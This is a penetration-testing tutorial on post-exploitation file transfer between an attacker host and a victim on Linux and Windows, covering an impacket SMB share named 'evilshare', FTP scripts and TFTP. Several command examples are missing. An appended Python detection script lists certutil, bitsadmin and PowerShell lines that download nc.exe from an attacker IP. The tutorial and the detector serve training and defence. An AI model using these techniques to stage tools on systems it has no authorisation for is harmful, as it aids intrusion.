File Transfer is one of the most crucial aspects of post-exploitation. You will need to move files, exploits, or tools between the victim's machine and your machine. You need to know various methods of transferring files depending on the OS and tools available on the system. Some of them are below:
Linux
HTTP
If the target machine has wget or curl installed, the easiest way to transfer files is through HTTP. You need to start an HTTP server on your host machine in the directory which contains the file you want to transfer.
Now you can download the files on the target machine as follows.
Netcat
If netcat is installed on the target machine, we can use it to transfer files.
SCP
If you have SSH access to the target machine, you can transfer files using SCP as follows:
Windows
HTTP
Even though Windows doesn't have wget, we can use other options to download files via HTTP. Some of them are:
Powershell
Certutil
Bitsadmin
SMB
The easiest method to transfer files between Linux and Windows is SMB, since it doesn't require any special configuration or commands, and SMB is built into every Windows machine. You can also execute any binary directly from the SMB share without needing to copy it to the target machine.
First, start an SMB share on your host machine.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py evilshare .
The path to smbserver.py may differ from mine depending on your impacket installation. You can test whether the SMB share is up using the net view command on Windows.
net view \\<host_ip>
Now you can copy files from the share to the target machine using copy or move, and vice versa.
Or you can execute the binary directly from the share without copying it:
\\<host_ip>\share-name\binary.exe
FTP
FTP is another method as handy as SMB as it's also built-in on Windows. However, it will only work if you have an interactive shell where you can use the FTP prompt to issue commands. If you don't have an interactive shell, you will need to create a file containing the command and feed it to FTP.
Install a Python library called pyftpdlib.
sudo apt-get install python3-pyftpdlib
Start an FTP server with:
If you have an interactive shell, you can just log into the FTP server with ftp <host_ip> <port> and use anonymous as the credentials. If you don't have an interactive shell, create a text file with the following content.
Now simply run ftp -s:filename.txt, and it will download the file you specified.
TFTP
TFTP is similar to FTP, but it isn't installed natively on newer versions of Windows. If it is available on the target machine (you can also enable it with pkgmgr /iu:"TFTP"), you can start a TFTP server on your machine with:
service atftpd start
and get files from the target machine with:
tftp -i <host_ip> GET binary.exe
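From the defender's side, every Windows method above leaves a recognisable process command line (certutil, bitsadmin or PowerShell with a URL, ftp -s:, tftp -i ... GET, or an image path on a UNC share). The following is an added detection example, not code from the original post; it runs a small set of regex rules over constructed command lines modelled on Sysmon process-creation events, and the IPs, share name and file names in the samples are made up.

```python
import re

# Each rule pairs a technique label with a regex applied to the lower-cased
# command line. The patterns key on the tool name plus one tell-tale argument
# (a URL, the ftp -s: script switch, a tftp GET, or a UNC path as the image).
RULES = [
    ("certutil HTTP download", re.compile(r"\bcertutil(\.exe)?\b.*https?://")),
    ("bitsadmin HTTP download", re.compile(r"\bbitsadmin(\.exe)?\b.*https?://")),
    ("PowerShell HTTP download",
     re.compile(r"\bpowershell(\.exe)?\b.*(https?://|downloadfile|downloadstring)")),
    ("ftp scripted transfer", re.compile(r"\bftp(\.exe)?\b.*\s-s:")),
    ("tftp GET", re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\bget\b")),
    ("binary launched from UNC share",
     re.compile(r'^"?\\\\[^\\\s]+\\[^\\\s]+\\\S*\.(exe|dll|bat|msi)\b')),
]


def classify(command_line):
    """Return the technique labels whose pattern matches this command line."""
    cl = command_line.lower()
    return [label for label, pattern in RULES if pattern.search(cl)]


def scan(command_lines):
    """Return (label, command_line) pairs for every line that matches a rule."""
    findings = []
    for cl in command_lines:
        for label in classify(cl):
            findings.append((label, cl))
    return findings


# Constructed sample command lines (Sysmon Event ID 1 style); four are benign.
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    r"certutil.exe -urlcache -f http://10.10.14.5:8000/nc.exe nc.exe",
    r"bitsadmin.exe /transfer job /download http://10.10.14.5:8000/nc.exe C:\Users\Public\nc.exe",
    r'powershell.exe -c "Invoke-WebRequest http://10.10.14.5:8000/nc.exe -OutFile nc.exe"',
    r"powershell.exe -File C:\scripts\nightly-backup.ps1",
    r"ftp.exe -s:C:\Users\Public\ftp.txt",
    r"ftp.exe files.example.org",
    r"tftp.exe -i 10.10.14.5 GET binary.exe",
    r"net view \\10.10.14.5",
    r"\\10.10.14.5\evilshare\binary.exe",
]

if __name__ == "__main__":
    for label, cl in scan(SAMPLE_COMMAND_LINES):
        print(f"[{label}] {cl}")
```

The rules are deliberately coarse (tool name plus one argument), so tune them against your own baseline: an interactive ftp session or a scheduled PowerShell script without a URL produces no finding, while the six transfer command lines each produce exactly one.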
These are the most popular methods of post-exploit file transfer on Windows and Linux! Catch you in the next one.